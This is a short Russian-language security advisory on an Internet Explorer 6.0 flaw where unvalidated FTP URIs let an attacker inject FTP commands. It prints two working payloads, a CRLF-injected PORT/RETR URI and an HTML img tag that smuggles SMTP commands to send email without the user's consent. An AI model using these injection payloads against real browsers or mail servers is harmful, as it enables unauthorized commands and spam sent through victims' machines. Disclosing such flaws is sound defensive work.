Программа: Microsoft Internet Explorer 6.0

Уязвимость позволяет удаленному злоумышленнику выполнить произвольные команды на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке URI, перед его использованием для выполнения FTP команд на удаленных серверах. Атакующий может вставить произвольные команды FTP сервера в специально сформированные URI, что приведет к выполнению произвольных команд в браузере жертвы. Эксплуатирование данной уязвимости также может привести к отправке сообщения без согласия пользователя.

Пример:

ftp://ftp.example.com/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file

Буквы ‘a,b,c,d,e,f’ представляют IP адрес и порт, согласно FTP RFC.

Вложенное изображение в HTML страницу способно отправить электронное письмо без подтверждения пользователя:

<img src="ftp://foo%0d%0aHELO%20mail%0d%0aMAIL%20FROM%3a<> %0d%0aRCPT%20TO%3a<username%40example.com>%0d%0aDATA%0d%0aSubject%3a%20hacked%0d%0a To%3a%20username%40 example.com%0d%0a%0d%0ahacked%0d%0a.%0d%0a:username@mx.example.net:25/" />



Оставить мнение